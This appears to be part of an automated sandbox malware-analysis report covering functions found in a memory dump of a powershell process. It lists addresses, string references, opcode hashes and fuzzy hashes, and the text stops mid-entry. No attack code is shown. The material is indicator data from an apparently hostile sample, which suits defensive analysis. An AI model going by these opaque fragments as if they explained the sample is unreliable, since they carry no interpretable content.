4'^q, xrefs: 076B4A21
4'^q, xrefs: 076B3DCE
4'^q, xrefs: 076B3DC2

Memory Dump Source

Source File: 00000001.00000002.2242172192.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_76b0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q
API String ID: 0-3166488486
Opcode ID: a006d40fecefa59b9e8d3c49fc0534a1065a50481e24634a406b2f81678e10f0
Instruction ID: ffcb6e77ec4a1f756df354a1160363db126504158e0cdd9c97a6fcc5c225d332
Opcode Fuzzy Hash: a006d40fecefa59b9e8d3c49fc0534a1065a50481e24634a406b2f81678e10f0
Instruction Fuzzy Hash: ED9272B0A00255CFDB24DB69C950B9EBBB2EF85304F10C5AAD50AAB755CB31EC85CF91

Function 076B1148 Relevance: 8.1, Strings: 6, Instructions: 627COMMON

Download Yara Rule

Strings

tP^q, xrefs: 076B11DF
4'^q, xrefs: 076B14B6
4'^q, xrefs: 076B1744
4'^q, xrefs: 076B14C2
4'^q, xrefs: 076B1738
tP^q, xrefs: 076B11D3

Memory Dump Source

Source File: 00000001.00000002.2242172192.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_76b0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q
API String ID: 0-445857065
Opcode ID: 0fe66b38e290ca6e3993f61647d8ce6d2e42afa1ecc111e65fb4c3178925803f
Instruction ID: 9067346a70195b6d27fe3af502b725caaceec5d5e4e337ef894dbbcbeb17b867
Opcode Fuzzy Hash: 0fe66b38e290ca6e3993f61647d8ce6d2e42afa1ecc111e65fb4c3178925803f
Instruction Fuzzy Hash: FB329670B00209AFD728DB68C851B9ABBF2EF86304F14C459E9069F755CB72ED85CB91

Function 076B0840 Relevance: 6.5, Strings: 5, Instructions: 233COMMON

Download Yara Rule

Strings

4'^q, xrefs: 076B08E0
$^q, xrefs: 076B08BB
4'^q, xrefs: 076B08D4
$^q, xrefs: 076B08AF
$^q, xrefs: 076B0893

Memory Dump Source

Source File: 00000001.00000002.2242172192.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_76b0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q
API String ID: 0-3272787073
Opcode ID: 7844fa9753ff59cd90dace4057abde15f4d4d3be64f85720be42292a16b8ec55
Instruction ID: 642756a4176e957fec4db9497577a16d67cc37b4789ce36236bf3830c83a7b06
Opcode Fuzzy Hash: 7844fa9753ff59cd90dace4057abde15f4d4d3be64f85720be42292a16b8ec55
Instruction Fuzzy Hash: DE7119B1B002198FDB249E7988002EBBFA5EF86210F14857AD816DB355DB31D985C7E1

Function 076B87E8 Relevance: 5.6, Strings: 4, Instructions: 590COMMON

Download Yara Rule

Strings

4'^q, xrefs: 076B8CC0
4'^q, xrefs: 076B8B30
4'^q, xrefs: 076B8B26
4'^q, xrefs: 076B8CB6

Memory Dump Source

Source File: 00000001.00000002.2242172192.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_76b0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q
API String ID: 0-1420252700
Opcode ID: a06060926353dd799eab90090bbb91a756c32b61ecfec15e6f88ab10e524294d
Instruction ID: 34d9e185255d438935060fc22f2f0b707f4adf24b0bb12c1b464234c3ea9e7bc
Opcode Fuzzy Hash: a06060926353dd799eab90090bbb91a756c32b61ecfec15e6f88ab10e524294d
Instruction Fuzzy Hash: 99121AB17043178FDB259B7888116AABBAAAFC6310F14C4AAD506CF356DB31DC85CBD1

Function 076BD716 Relevance: 5.0, Strings: 3, Instructions: 1234COMMON

Download Yara Rule

Strings

4'^q, xrefs: 076BC57A
4'^q, xrefs: 076BC61E
4'^q, xrefs: 076BD310

Memory Dump Source

Source File: 00000001.00000002.2242172192.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_76b0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q
API String ID: 0-1196845430
Opcode ID: b05e85857bd1bb664832b010e740d3a518392570177f7b8b3fa9a90beeede8ca
Instruction ID: 3a07f2c80ab23461fa193d0ea55ce08292a4f3dcdf74254623e2330b0abf64b7
Opcode Fuzzy Hash: b05e85857bd1bb664832b010e740d3a518392570177f7b8b3fa9a90beeede8ca
Instruction Fuzzy Hash: 34C24374A40218DFDB24DB64C950BEABBB2FB89304F108499D90AAF751DB31ED85CF91

Function 076B0B48 Relevance: 2.7, Strings: 2, Instructions: 171COMMON

Download Yara Rule

Strings

tP^q, xrefs: 076B0BF8
tP^q, xrefs: 076B0BEC

Memory Dump Source

Source File: 00000001.00000002.2242172192.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_76b0000_powershell.jbxd

Similarity

API ID:
String ID: tP^q$tP^q
API String ID: 0-309238000
Opcode ID: 87b1dd7f927aab700207ea537a5909a0b645d41869e062c7abb0bcb4250e81cb
Instruction ID: a27c1978e01b7772f5780ce7de6452ab315dd3fb2feb3630e939518b899ac095
Opcode Fuzzy Hash: 87b1dd7f927aab700207ea537a5909a0b645d41869e062c7abb0bcb4250e81cb
Instruction Fuzzy Hash: 3A5115717543599FCB358A7988007ABBFA5AF87310F14C46AE546CB392CB36C885CBA1

Function 076B41DA Relevance: 2.1, Strings: 1, Instructions: 888COMMON

Download Yara Rule

Strings

4'^q, xrefs: 076B3DC2

Memory Dump Source

Source File: 00000001.00000002.2242172192.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_76b0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 9f061d2c84298a23a910447e3d98ad66f7df37611573dbb44bb23b52f1e7838f
Instruction ID: 230b6250d58ead71c8813796aa3a5fbbf674fb8d44ec9003b881933431181a48
Opcode Fuzzy Hash: 9f061d2c84298a23a910447e3d98ad66f7df37611573dbb44bb23b52f1e7838f
Instruction Fuzzy Hash: B78294B0A00254CFDB24DB68C950B9EBBB2EF85304F10C5AAD94A6B755CB31ED85CF91

Function 076B33A4 Relevance: 2.1, Strings: 1, Instructions: 836COMMON

Download Yara Rule

Strings

4'^q, xrefs: 076B3DC2

Memory Dump Source

Source File: 00000001.00000002.2242172192.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_76b0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 0c7772f49741dd5a7cee9b7c585db07461e8b0917f0e42a0ddc3edccb700f35b
Instruction ID: 8e79bea7f00c9c2c39acacf096118304b465cf00fe978cd73d2e9b80bed859e3
Opcode Fuzzy Hash: 0c7772f49741dd5a7cee9b7c585db07461e8b0917f0e42a0ddc3edccb700f35b
Instruction Fuzzy Hash: 1E728EB4A00254CFDB24DB69C950BAABBB2EF85304F10C59AD90A6B755CB31EC85CF91

Function 076B43A4 Relevance: 1.9, Strings: 1, Instructions: 648COMMON

Download Yara Rule

Strings

4'^q, xrefs: 076B3DC2

Memory Dump Source

Source File: 00000001.00000002.2242172192.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_76b0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: db192d80c7cde00769d2bfe3f17692b65eb22378cb0c8efee4ba9afb1e059424
Instruction ID: 5101ba8248ae363872776f2a81df907a75510bf6aec4551932291159139786db
Opcode Fuzzy Hash: db192d80c7cde00769d2bfe3f17692b65eb22378cb0c8efee4ba9afb1e059424
Instruction Fuzzy Hash: 5F5270B0A00254CFDB24DB68C950B9EBBB2EF85304F10C99AD94A6B755CB31ED85CF91

Function 076BD8DA Relevance: 1.9, Strings: 1, Instructions: 624COMMON

Download Yara Rule

Strings

4'^q, xrefs: 076BD310

Memory Dump Source

Source File: 00000001.00000002.2242172192.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_76b0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 7d1f0c3af648e71b7d7590ad2aa214ad9bd35f4b95e04ffdee20daac31b11964
Instruction ID: 829d34950f10d5b00d5f7cd5789a2184bb1fb280b5894b19cfce73412e9b7632
Opcode Fuzzy Hash: 7d1f0c3af648e71b7d7590ad2aa214ad9bd35f4b95e04ffdee20daac31b11964
Instruction Fuzzy Hash: 6D425274A40318DFDB24DB64C951BAABBB2BB89304F10C4A9D50A6F781DB31ED85CF91

Function 076BD925 Relevance: 1.8, Strings: 1, Instructions: 558COMMON

Download Yara Rule

Strings

4'^q, xrefs: 076BDDE1

Memory Dump Source

Source File: 00000001.00000002.2242172192.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_76b0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: ef8e2fde851502cc8664d9b4a4845dadbdd05b0d29338c6eec398714c9b24cb3
Instruction ID: b468740757c3508f752a4e73d69b113d1551df19de07b02fd8611e76d7cb6f91
Opcode Fuzzy Hash: ef8e2fde851502cc8664d9b4a4845dadbdd05b0d29338c6eec398714c9b24cb3
Instruction Fuzzy Hash: D9422FB4A40215CFDB34DB64C950BE9BBB2AB86304F1084E9D90AAB750DB72EDC5CF51

Function 076BDB6C Relevance: 1.7, Strings: 1, Instructions: 435COMMON

Download Yara Rule

Strings

4'^q, xrefs: 076BDDE1

Memory Dump Source

Source File: 00000001.00000002.2242172192.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_76b0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 7e25b804ac2c7975fc0beac025f87e4458bcbdaeb1e4106dd09c75c9ee27c77a
Instruction ID: dfc5c5a9d1070122c522219a1c6e43ed813259d278498802fb3623ebbebb9f7b
Opcode Fuzzy Hash: 7e25b804ac2c7975fc0beac025f87e4458bcbdaeb1e4106dd09c75c9ee27c77a
Instruction Fuzzy Hash: 0A123DB4A40219CFEB35DB64C850BE9B7B2AB86304F1084E9D90AAB751D732EDC5CF51

Function 076B6292 Relevance: 1.3, Strings: 1, Instructions: 99COMMON

Download Yara Rule

Strings

$^q, xrefs: 076B6272

Memory Dump Source

Source File: 00000001.00000002.2242172192.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_76b0000_powershell.jbxd

Similarity

API ID:
String ID: $^q
API String ID: 0-388095546
Opcode ID: 71e2893f058aac947dba8a207a7c610b2773cd7cf7d7449e104be857fda6cd42
Instruction ID: 3d86e9f4913eab10b605dd01224c930e8245ae39011379a8f10e664206e0f5af
Opcode Fuzzy Hash: 71e2893f058aac947dba8a207a7c610b2773cd7cf7d7449e104be857fda6cd42
Instruction Fuzzy Hash: 703128B16042058FEB208F24E8117EA7BB2AFD3200F44446AD502DB392CB75C9CAC7D2

Function 076B62B0 Relevance: .2, Instructions: 228COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2242172192.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_76b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0ac20c2dce1c03970b9d1b309b905545727ebdfad057afbaa1d06a351f697b3
Instruction ID: 6c657948444cfa2ef22fcd9ce558d28ca63d9ace2b6bf64a514d20b4e40cb730
Opcode Fuzzy Hash: f0ac20c2dce1c03970b9d1b309b905545727ebdfad057afbaa1d06a351f697b3
Instruction Fuzzy Hash: 3F7129B2B002168FDB309E79D8512EBBBE1ABC7210F14847AD907DB341DB31D989C7A1

Function 076B87D6 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2242172192.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_76b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3e502c661371de427b9d94bb4589cf89caad65986d0905f621a5f20432e7905
Instruction ID: 60861a7b0ed9abd82d71de685a9fab0443ce6e21866fecaa871ab26e96c498eb
Opcode Fuzzy Hash: c3e502c661371de427b9d94bb4589cf89caad65986d0905f621a5f20432e7905
Instruction Fuzzy Hash: B941B7F1A10203CFEB349F3889416AA77AAAFC6354F1484A5D9069B351D731ED85CBD2

Function 076B4BB8 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2242172192.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_76b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86eb317dc41d24deac5dd71f5fbd02eea9e90fd72ac3e26a5e9895235393e781
Instruction ID: 8ed0d3324efe582cde485557c12459484e027b2506b6a52031ca1ac0cb1f1cf7
Opcode Fuzzy Hash: 86eb317dc41d24deac5dd71f5fbd02eea9e90fd72ac3e26a5e9895235393e781
Instruction Fuzzy Hash: 8C315E317402189BE714AB68C955FAE7BA3EBC5304F50C464E9016F396CF76EC4A8BE1

Function 076B0EB0 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2242172192.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_76b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9431341cf8aa2ab121a424ab51e11bd7745698e3ba697f143a51c6785450405
Instruction ID: e82bcb497537f9b875b8d3832194119c749ba47d8ec9c5b1b8cf0730a954e9a8
Opcode Fuzzy Hash: e9431341cf8aa2ab121a424ab51e11bd7745698e3ba697f143a51c6785450405
Instruction Fuzzy Hash: 5C216E7170031A6BDB3459BA88407BBBACA9BC6701F28C439E907CB385CD75D9C183A1

Function 076B0E96 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2242172192.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_76b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6902fc4432dad954fc0df6fc2c034e101e27ea306390fa6ee3c2178b3520e0d
Instruction ID: 7ef951242009f7201999e0b20ce649d316d9000970159d11ef9e2e1d0a5c8fd6
Opcode Fuzzy Hash: d6902fc4432dad954fc0df6fc2c034e101e27ea306390fa6ee3c2178b3520e0d
Instruction Fuzzy Hash: 162179B03043456BDB344AB58840BA77FD59F82700F2C842AE846DB381CA38E9C5C761

Function 076B09B8 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2242172192.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_76b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9979c150df8ea94dd72214ad5c0a906ae65df4a00bf10891880a0fd1786730d7
Instruction ID: ec760659b8a979855981c219f2410c892b978d67f0b4164eea40a918b60da95c
Opcode Fuzzy Hash: 9979c150df8ea94dd72214ad5c0a906ae65df4a00bf10891880a0fd1786730d7
Instruction Fuzzy Hash: 2711D5B1E002199BCB249F79C5401AEBBE5AF4A210B258965DC1AEB345DA30DD80CBB0

Function 076B2B40 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2242172192.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_76b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eba620cf62e75e89bd4bd6dc06dfb63983d9a3e438801759917a6a33669810e4
Instruction ID: b7686860323edd2c678aea8e65c4e5afc8061322bd96ea029c956cc45304f38c
Opcode Fuzzy Hash: eba620cf62e75e89bd4bd6dc06dfb63983d9a3e438801759917a6a33669810e4
Instruction Fuzzy Hash: 0701F7B771422A8FCB309D6DD4206A6B7DAABCB225B14843BD506C7350DE72C882C3A0

Function 076B1A7E Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2242172192.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_76b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1324c54584dd5a3efb68d08c1b79dc5ea59c799ca8b81e336e92b0e4b872362
Instruction ID: 68b190708e04f8da35b2a66eebe6b4c4a76a26a743b64b4e36f8e63db8a473ea
Opcode Fuzzy Hash: a1324c54584dd5a3efb68d08c1b79dc5ea59c799ca8b81e336e92b0e4b872362
Instruction Fuzzy Hash: 8BA011302000008BEA00CB00C882C08B320EB80208B28C888A8088F282CBB3EA03CA00

Non-executed Functions

Function 076B7E18 Relevance: 13.0, Strings: 10, Instructions: 460COMMON

Download Yara Rule

Strings

$^q, xrefs: 076B8336
$^q, xrefs: 076B82FF
$^q, xrefs: 076B81AC
tP^q, xrefs: 076B8248
tP^q, xrefs: 076B823C
4'^q, xrefs: 076B7EC2
4'^q, xrefs: 076B80C5
$^q, xrefs: 076B832A
4'^q, xrefs: 076B80CF
4'^q, xrefs: 076B7ECE

Memory Dump Source

Source File: 00000001.00000002.2242172192.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_76b0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q
API String ID: 0-788909730
Opcode ID: b2d74c7da261b2211edb6ab2a3517a03b34239cc43bddc31e283835fc7519f8f
Instruction ID: 97bf3773b87164d235c16d8bd9d9685192c7a2fa6edb721f32f5555e3d6d22bc
Opcode Fuzzy Hash: b2d74c7da261b2211edb6ab2a3517a03b34239cc43bddc31e283835fc7519f8f
Instruction Fuzzy Hash: FBF11BB1B053578FD7358B7988106AABBAAAFC3310F1884ABD546CB355DA31C8C6C7D1

Function 076BE6D8 Relevance: 11.5, Strings: 9, Instructions: 282COMMON

Download Yara Rule

Strings

4'^q, xrefs: 076BE984
4'^q, xrefs: 076BE75D
$^q, xrefs: 076BE8FE
$^q, xrefs: 076BE953
tP^q, xrefs: 076BE7A7
4'^q, xrefs: 076BE751
4'^q, xrefs: 076BE990
$^q, xrefs: 076BE963
tP^q, xrefs: 076BE7B3

Memory Dump Source

Source File: 00000001.00000002.2242172192.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_76b0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
API String ID: 0-2378468523
Opcode ID: 73caa05973676574c77884d8f7dd76f8cbbe3b8634f4ad2462271e3ded1bcffd
Instruction ID: 187faca70f8239e55e8c9641f7d60def54270528f78e720e04fd9ab8d70d83da
Opcode Fuzzy Hash: 73caa05973676574c77884d8f7dd76f8cbbe3b8634f4ad2462271e3ded1bcffd
Instruction Fuzzy Hash: CBA1D571A00209CFCB389E78C5446EABBA2FF86710F24C46AD5168F355DB32D9CAC791

Function 076BF41A Relevance: 11.5, Strings: 9, Instructions: 229COMMON

Download Yara Rule

Strings

4'^q, xrefs: 076BF6BB
tP^q, xrefs: 076BF611
tP^q, xrefs: 076BF61D
d%dq, xrefs: 076BF5D7
4'^q, xrefs: 076BF6AF
d%dq, xrefs: 076BF645
d%dq, xrefs: 076BF63B
$^q, xrefs: 076BF4F8
d%dq, xrefs: 076BF67A

Memory Dump Source

Source File: 00000001.00000002.2242172192.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_76b0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$d%dq$d%dq$d%dq$d%dq$tP^q$tP^q$$^q
API String ID: 0-202320237
Opcode ID: f5ff36968e93dc9bdfb309dc86f7cfc40238d7016e22264e70e19d919a63657d
Instruction ID: c86b1165ea9545d8566695c512a3e6e1c5f191cc338280489d2074ad86904610
Opcode Fuzzy Hash: f5ff36968e93dc9bdfb309dc86f7cfc40238d7016e22264e70e19d919a63657d
Instruction Fuzzy Hash: D681F9B1B102169FDB348F34DC54AEAB7E2AF8A310F1484A9E9069B371DB31DD85C791

Function 076B8428 Relevance: 10.3, Strings: 8, Instructions: 317COMMON

Download Yara Rule

Strings

$^q, xrefs: 076B846C
4'^q, xrefs: 076B8635
tP^q, xrefs: 076B84B1
tP^q, xrefs: 076B84A5
$^q, xrefs: 076B870E
$^q, xrefs: 076B8460
$^q, xrefs: 076B843A
4'^q, xrefs: 076B8629

Memory Dump Source

Source File: 00000001.00000002.2242172192.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_76b0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q
API String ID: 0-3865595929
Opcode ID: 31a2a671ed73fea3440ba84b1cdbee6e921638f99a6c2951f153290be1a4aeb3
Instruction ID: aeb811ea374fb31812caceafccc958631fe9cba6b15b3e325b66e5f4f117aed1
Opcode Fuzzy Hash: 31a2a671ed73fea3440ba84b1cdbee6e921638f99a6c2951f153290be1a4aeb3
Instruction Fuzzy Hash: FCA149B27043168FD7359B7998406AABBA9AFC7710F18847BD406CF352DA31D889C7E1

Function 076BF94C Relevance: 10.2, Strings: 8, Instructions: 164COMMON

Download Yara Rule

Strings

4'^q, xrefs: 076BFBBE
tP^q, xrefs: 076BFACE
TQcq, xrefs: 076BF9BA
W, xrefs: 076BF95C
TQcq, xrefs: 076BFB62
$^q, xrefs: 076BF9FC
$^q, xrefs: 076BFB8C
$^q, xrefs: 076BF9DB

Memory Dump Source

Source File: 00000001.00000002.2242172192.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_76b0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$TQcq$TQcq$W$tP^q$$^q$$^q$$^q
API String ID: 0-2487916693
Opcode ID: fdfa2e095bb15e88e415251990e5d8db777bdcf05553a7d758c5626cb3e4d7d9
Instruction ID: ffec995c00525bbee41895bdbe190dbd3d53ce0c811a8e7cac9681b2629f665c
Opcode Fuzzy Hash: fdfa2e095bb15e88e415251990e5d8db777bdcf05553a7d758c5626cb3e4d7d9
Instruction Fuzzy Hash: 1B51B1B0A10206DFDB388E24CD547E6B7E2AF46711F1488AAE8069B7B5C731DDC5CB91

Function 076BEA70 Relevance: 7.7, Strings: 6, Instructions: 210COMMON

Download Yara Rule

Strings

$^q, xrefs: 076BEB71
4'^q, xrefs: 076BEB9B
$^q, xrefs: 076BEB16
$^q, xrefs: 076BEC86
4'^q, xrefs: 076BEB8F
$^q, xrefs: 076BEB61

Memory Dump Source

Source File: 00000001.00000002.2242172192.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_76b0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q$$^q
API String ID: 0-3669853574
Opcode ID: 3fe9cc5f9e5450ea8fedab055c7797e0fcb9b0435ecd868f4e421ee57e7b5b88
Instruction ID: 8bf8301b6ea9643208ef894c6c2611e560503bb9067f12a776ea2ea9895f5ead
Opcode Fuzzy Hash: 3fe9cc5f9e5450ea8fedab055c7797e0fcb9b0435ecd868f4e421ee57e7b5b88
Instruction Fuzzy Hash: 1D61F6B1B0420A8FCB388E79D5446EABBA6AF83211F14C56AD417CF351DB32D9C5CB91

Function 076B0538 Relevance: 6.4, Strings: 5, Instructions: 147COMMON

Download Yara Rule

Strings

4'^q, xrefs: 076B0632
$^q, xrefs: 076B05C4
$^q, xrefs: 076B0609
4'^q, xrefs: 076B0626
$^q, xrefs: 076B05FD

Memory Dump Source

Source File: 00000001.00000002.2242172192.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_76b0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q
API String ID: 0-3272787073
Opcode ID: b262e4a54c42387fbf9754f458f1be0565f0e0037bdcc7dfce8be636e876c324
Instruction ID: 474d7d2fd2841ae9776965222e112bef55de48a7d9d4abc22d9bed1a7713e4a3
Opcode Fuzzy Hash: b262e4a54c42387fbf9754f458f1be0565f0e0037bdcc7dfce8be636e876c324
Instruction Fuzzy Hash: 2C41F9B1B143059FDB355B3488107EB7FA19FC6210F14846AD506DF392EE36C985C7A1

Function 076BF798 Relevance: 6.4, Strings: 5, Instructions: 122COMMON

Download Yara Rule

Strings

4'^q, xrefs: 076BF87D
$^q, xrefs: 076BF80B
$^q, xrefs: 076BF851
4'^q, xrefs: 076BF871
$^q, xrefs: 076BF845

Memory Dump Source

Source File: 00000001.00000002.2242172192.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_76b0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q
API String ID: 0-3272787073
Opcode ID: 816a34c16e26879ee907b9855b2231573d33368d6dba0e01a0bd1eb4909d46f7
Instruction ID: bad32499707e19ed00abd605ee83c2abfc41820f9dd1f97cc5f39589b3396687
Opcode Fuzzy Hash: 816a34c16e26879ee907b9855b2231573d33368d6dba0e01a0bd1eb4909d46f7
Instruction Fuzzy Hash: CB41C5B1B1021A8FCB344A799C006EAB7F5AF86610F24847AD917D7365DF32C9C6C7A1

Function 076BAE70 Relevance: 6.4, Strings: 5, Instructions: 108COMMON

Download Yara Rule

Strings

$^q, xrefs: 076BAEE9
$^q, xrefs: 076BAECD
$^q, xrefs: 076BAFE6
4'^q, xrefs: 076BB01B
tP^q, xrefs: 076BAF6B

Memory Dump Source

Source File: 00000001.00000002.2242172192.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_76b0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$tP^q$$^q$$^q$$^q
API String ID: 0-3997570045
Opcode ID: c7f1860c886169a6effc16f24678121a94d8e60479a2cb9c43f69f95539e5af3
Instruction ID: 9b1bb74940913481c06fad6d6f6e299d00428957dc6be77ccdecef69907d90e9
Opcode Fuzzy Hash: c7f1860c886169a6effc16f24678121a94d8e60479a2cb9c43f69f95539e5af3
Instruction Fuzzy Hash: C531D5F0A00205DFDB348EA5C544FF9B7A6AB46710F18C56AE42B5B391C732E9C6CB51

Function 076BF55E Relevance: 6.3, Strings: 5, Instructions: 85COMMON

Download Yara Rule

Strings

tP^q, xrefs: 076BF611
d%dq, xrefs: 076BF5D7
d%dq, xrefs: 076BF645
4'^q, xrefs: 076BF6AF
d%dq, xrefs: 076BF63B

Memory Dump Source

Source File: 00000001.00000002.2242172192.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_76b0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$d%dq$d%dq$d%dq$tP^q
API String ID: 0-3846404929
Opcode ID: e6a2d0af96118b8c91b215b28465d1e17ffda98c05aa47dba9bcaa919503b4a4
Instruction ID: d588024d521b6341ca0177ba158ff66f2236a0b4edb9f216fee73282058fd669
Opcode Fuzzy Hash: e6a2d0af96118b8c91b215b28465d1e17ffda98c05aa47dba9bcaa919503b4a4
Instruction Fuzzy Hash: D531A4B1B002199FCB28DF24C894AD9B7A2FB8D710F248555E906AB371DA31DD81CB90

Function 076BED28 Relevance: 5.5, Strings: 4, Instructions: 476COMMON

Download Yara Rule

Strings

